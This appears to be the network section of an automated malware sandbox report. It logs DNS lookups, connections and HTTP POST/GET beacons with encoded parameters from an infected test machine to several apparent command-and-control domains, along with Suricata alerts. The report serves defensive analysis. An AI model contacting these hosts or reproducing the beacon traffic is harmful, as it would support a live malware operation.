Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.zocalo-fuk.com | 157.7.107.37 | |
| www.exporationgenius.sbs | 104.21.57.28 | |
| www.loangoatworld.com |
CNAME
loangoatworld.com
|
3.33.130.190 |
| www.miquwawa.com |
CNAME
miquwawa.com
|
95.169.27.235 |
| www.noghteyab.com | 46.105.190.248 | |
| www.sqlite.org | 45.33.6.223 | |
| www.tcfreal.top | 203.161.50.128 |
- TCP Requests
-
-
192.168.56.101:49180 104.21.57.28:80www.exporationgenius.sbs
-
192.168.56.101:49181 104.21.57.28:80www.exporationgenius.sbs
-
192.168.56.101:49182 157.7.107.37:80www.zocalo-fuk.com
-
192.168.56.101:49183 157.7.107.37:80www.zocalo-fuk.com
-
192.168.56.101:49184 203.161.50.128:80www.tcfreal.top
-
192.168.56.101:49185 203.161.50.128:80www.tcfreal.top
-
192.168.56.101:49188 3.33.130.190:80www.loangoatworld.com
-
192.168.56.101:49189 3.33.130.190:80www.loangoatworld.com
-
192.168.56.101:49175 45.33.6.223:80www.sqlite.org
-
192.168.56.101:49186 51.89.93.193:80www.noghteyab.com
-
192.168.56.101:49187 51.89.93.193:80www.noghteyab.com
-
192.168.56.101:49173 95.169.27.235:80www.miquwawa.com
-
192.168.56.101:49174 95.169.27.235:80www.miquwawa.com
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:54151 239.255.255.250:1900
-
192.168.56.103:137 192.168.56.101:137
-
POST
404
http://www.miquwawa.com/tqql/
REQUEST
RESPONSE
BODY
POST /tqql/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Cache-Control: no-cache
Connection: close
Host: www.miquwawa.com
Origin: http://www.miquwawa.com
Referer: http://www.miquwawa.com/tqql/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
x-dns-prefetch-control: on
x-litespeed-tag: 2a1_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
content-type: text/html; charset=UTF-8
link: <https://miquwawa.com/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
cache-control: no-cache, no-store, must-revalidate, max-age=0
content-encoding: gzip
vary: Accept-Encoding
content-length: 24554
date: Mon, 29 Jul 2024 04:19:21 GMT
server: LiteSpeed
connection: close
GET
301
http://www.miquwawa.com/tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.miquwawa.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 301 Moved Permanently
x-dns-prefetch-control: on
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://miquwawa.com/tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 2a1_HTTP.404,2a1_HTTP.301,2a1_404,2a1_URL.8568d83147aefeb65884e25abb290c35,2a1_guest,2a1_
x-litespeed-cache: miss
content-length: 0
date: Mon, 29 Jul 2024 04:19:23 GMT
server: LiteSpeed
connection: close
GET
200
http://www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
REQUEST
RESPONSE
BODY
GET /2017/sqlite-dll-win32-x86-3160000.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Host: www.sqlite.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 29 Jul 2024 04:19:25 GMT
Last-Modified: Mon, 02 Jan 2017 21:10:17 GMT
Cache-Control: max-age=120
ETag: "m586ac1b9s6b84e"
Content-type: application/zip; charset=utf-8
Content-length: 440398
POST
404
http://www.exporationgenius.sbs/x06k/
REQUEST
RESPONSE
BODY
POST /x06k/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.exporationgenius.sbs
Origin: http://www.exporationgenius.sbs
Referer: http://www.exporationgenius.sbs/x06k/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:44 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HK6H52N0s%2FxT7ybGj3wyoYjIyKtMzJ9AQh%2B6toSO3BXWmukEmSrQ49ImioA%2BwPAghXT971ZlRpCS17siONvAzVIqOy5Uzf3c6Dym1Bhawd0KT%2BIdAt8YMmLyDh6zCn2KsR%2BCxWsc0cD2uk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8aaa4ff8c8b32f41-LAX
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60
GET
404
http://www.exporationgenius.sbs/x06k/?UX8=T/qtMR3LKa4LTbjxJENTE1gbHfbcMoDNkQwOkzuXYGM8AEnHwE1BoCD8ihzw/kVeeFO4GyYqoWqmFjylDbVKWJ6wgOd2jmN6i9pg74XS81AjK7oOmIcxjkpvsNU18Pzzy/zqp1g=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /x06k/?UX8=T/qtMR3LKa4LTbjxJENTE1gbHfbcMoDNkQwOkzuXYGM8AEnHwE1BoCD8ihzw/kVeeFO4GyYqoWqmFjylDbVKWJ6wgOd2jmN6i9pg74XS81AjK7oOmIcxjkpvsNU18Pzzy/zqp1g=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.exporationgenius.sbs
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:47 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BI%2BW6wIi%2FC36OfpFPzPK5be%2BoBPxVaCu39XHBzK7O8crQPlhmIK9faGA%2FSW%2BZuOjTokK%2FfFmIzeH4uYYc%2BWgtexzD53Obab9GrIMQ3ZHb3UecVUhSFlPA%2FXah7R2m%2Fg%2BgjNgtFohivlJD%2Bo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8aaa5009890a2f4d-LAX
alt-svc: h2=":443"; ma=60
POST
404
http://www.zocalo-fuk.com/iczo/
REQUEST
RESPONSE
BODY
POST /iczo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.zocalo-fuk.com
Origin: http://www.zocalo-fuk.com
Referer: http://www.zocalo-fuk.com/iczo/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:52 GMT
Content-Type: text/html
Content-Length: 19268
Connection: close
Server: Apache
Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT
Accept-Ranges: bytes
GET
404
http://www.zocalo-fuk.com/iczo/?UX8=JY7jtaSJ5x5vzidnjWySlw1C0GfgB4v3ywH460gVL7Ewt7sZ57bbwI6mxyJFGNyl5vwWXeVDvThdvQiyRvynE/Zjj7HkpiyOTqmD4v0kKDcwzqr276eGi6TkYHYmx5vmFqXXwms=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /iczo/?UX8=JY7jtaSJ5x5vzidnjWySlw1C0GfgB4v3ywH460gVL7Ewt7sZ57bbwI6mxyJFGNyl5vwWXeVDvThdvQiyRvynE/Zjj7HkpiyOTqmD4v0kKDcwzqr276eGi6TkYHYmx5vmFqXXwms=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.zocalo-fuk.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:54 GMT
Content-Type: text/html
Content-Length: 19268
Connection: close
Server: Apache
Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT
POST
404
http://www.tcfreal.top/sg27/
REQUEST
RESPONSE
BODY
POST /sg27/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.tcfreal.top
Origin: http://www.tcfreal.top
Referer: http://www.tcfreal.top/sg27/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:20:00 GMT
Server: Apache
Content-Length: 11834
Connection: close
Content-Type: text/html
GET
404
http://www.tcfreal.top/sg27/?UX8=cpYt0YSQq6qumPKkPw6QLfXM1KObFctjUwEln5zritMpGV/+kM1tCQF1oqocoz5p4KbVgOmLQvtuRCfM7FFF+QE7cX+gmvJNP2ErFAfMZUG54lXQ6wu+5V3NDlvvWDRsBB/6vdY=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /sg27/?UX8=cpYt0YSQq6qumPKkPw6QLfXM1KObFctjUwEln5zritMpGV/+kM1tCQF1oqocoz5p4KbVgOmLQvtuRCfM7FFF+QE7cX+gmvJNP2ErFAfMZUG54lXQ6wu+5V3NDlvvWDRsBB/6vdY=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.tcfreal.top
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:20:03 GMT
Server: Apache
Content-Length: 11834
Connection: close
Content-Type: text/html; charset=utf-8
POST
200
http://www.noghteyab.com/f97t/
REQUEST
RESPONSE
BODY
POST /f97t/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.noghteyab.com
Origin: http://www.noghteyab.com
Referer: http://www.noghteyab.com/f97t/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Jul 2024 04:20:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j7vrfg2qitefkmbu6d7a3pnmb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
GET
200
http://www.noghteyab.com/f97t/?UX8=hkoMjg324npAs1ZBeZ8TzD/yod4wthTGeTvgOqr4Vk4zrcx6pPdRyFEwEDn18B/c37XIJfunev42iw6n9kOhHfgC7TNK8DtkFlqbOeckPp33fVEaTkv/0VMweSZvG65qVo/UWng=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /f97t/?UX8=hkoMjg324npAs1ZBeZ8TzD/yod4wthTGeTvgOqr4Vk4zrcx6pPdRyFEwEDn18B/c37XIJfunev42iw6n9kOhHfgC7TNK8DtkFlqbOeckPp33fVEaTkv/0VMweSZvG65qVo/UWng=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.noghteyab.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Jul 2024 04:20:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g2dk0dg59bjs1epblgm86824n2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
POST
0
http://www.loangoatworld.com/8y3s/
REQUEST
RESPONSE
BODY
POST /8y3s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.loangoatworld.com
Origin: http://www.loangoatworld.com
Referer: http://www.loangoatworld.com/8y3s/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
GET
200
http://www.loangoatworld.com/8y3s/?UX8=m+e1HwtEOOeM4G5NTLK68Gp6Kwp+MY7uBR7SzEsfX5sQt5Y/60pxYxuDgYg2mwpPnMRTzCuNJ1kKNM0TTa/Wnuj7pyZLvslRvIdrySy2NFkwbRUK0Niqet6rEb5EadRpffeEIOc=&_e=jxcPGi4BG
REQUEST
RESPONSE
BODY
GET /8y3s/?UX8=m+e1HwtEOOeM4G5NTLK68Gp6Kwp+MY7uBR7SzEsfX5sQt5Y/60pxYxuDgYg2mwpPnMRTzCuNJ1kKNM0TTa/Wnuj7pyZLvslRvIdrySy2NFkwbRUK0Niqet6rEb5EadRpffeEIOc=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.loangoatworld.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 200 OK
Server: openresty
Date: Mon, 29 Jul 2024 04:20:20 GMT
Content-Type: text/html
Content-Length: 268
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.101:53850 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| TCP 192.168.56.101:49184 -> 203.161.50.128:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts